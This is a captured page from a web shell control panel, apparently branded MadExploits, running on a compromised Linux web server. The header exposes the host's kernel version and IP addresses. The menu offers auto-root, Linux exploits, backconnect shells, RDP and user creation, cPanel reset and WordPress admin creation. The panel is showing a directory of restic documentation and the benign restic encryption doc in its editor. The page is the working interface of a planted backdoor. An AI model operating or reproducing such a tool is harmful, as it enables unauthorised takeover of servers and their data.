Linux cyberpanel 5.15.0-156-generic #166-Ubuntu SMP Sat Aug 9 00:02:46 UTC 2025 x86_64
LiteSpeed
: 160.191.175.3 | : 216.73.216.114
Cant Read [ /etc/named.conf ]
8.2.29
aodai6801
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
restic /
html /
_sources /
[ HOME SHELL ]
Name
Size
Permission
Action
010_introduction.rst.txt
595
B
-rw-r--r--
020_installation.rst.txt
8.63
KB
-rw-r--r--
030_preparing_a_new_repo.rst.t...
25.93
KB
-rw-r--r--
040_backup.rst.txt
24.69
KB
-rw-r--r--
045_working_with_repos.rst.txt
11.53
KB
-rw-r--r--
050_restore.rst.txt
5.47
KB
-rw-r--r--
060_forget.rst.txt
17.4
KB
-rw-r--r--
070_encryption.rst.txt
1.82
KB
-rw-r--r--
075_scripting.rst.txt
1.39
KB
-rw-r--r--
080_examples.rst.txt
12.65
KB
-rw-r--r--
090_participating.rst.txt
4.93
KB
-rw-r--r--
100_references.rst.txt
499
B
-rw-r--r--
110_talks.rst.txt
1.21
KB
-rw-r--r--
REST_backend.rst.txt
4.02
KB
-rw-r--r--
cache.rst.txt
938
B
-rw-r--r--
design.rst.txt
26.71
KB
-rw-r--r--
developer_information.rst.txt
4.68
KB
-rw-r--r--
faq.rst.txt
8.73
KB
-rw-r--r--
index.rst.txt
360
B
-rw-r--r--
manual_rest.rst.txt
19.4
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : 070_encryption.rst.txt
.. Normally, there are no heading levels assigned to certain characters as the structure is determined from the succession of headings. However, this convention is used in Python’s Style Guide for documenting which you may follow: # with overline, for parts * for chapters = for sections - for subsections ^ for subsubsections " for paragraphs ########## Encryption ########## *"The design might not be perfect, but it’s good. Encryption is a first-class feature, the implementation looks sane and I guess the deduplication trade-off is worth it. So… I’m going to use restic for my personal backups.*" `Filippo Valsorda`_ .. _Filippo Valsorda: https://blog.filippo.io/restic-cryptography/ ********************** Manage repository keys ********************** The ``key`` command allows you to set multiple access keys or passwords per repository. In fact, you can use the ``list``, ``add``, ``remove``, and ``passwd`` (changes a password) sub-commands to manage these keys very precisely: .. code-block:: console $ restic -r /srv/restic-repo key list enter password for repository: ID User Host Created ---------------------------------------------------------------------- *eb78040b username kasimir 2015-08-12 13:29:57 $ restic -r /srv/restic-repo key add enter password for repository: enter password for new key: enter password again: saved new key as <Key of username@kasimir, created on 2015-08-12 13:35:05.316831933 +0200 CEST> $ restic -r /srv/restic-repo key list enter password for repository: ID User Host Created ---------------------------------------------------------------------- 5c657874 username kasimir 2015-08-12 13:35:05 *eb78040b username kasimir 2015-08-12 13:29:57
Close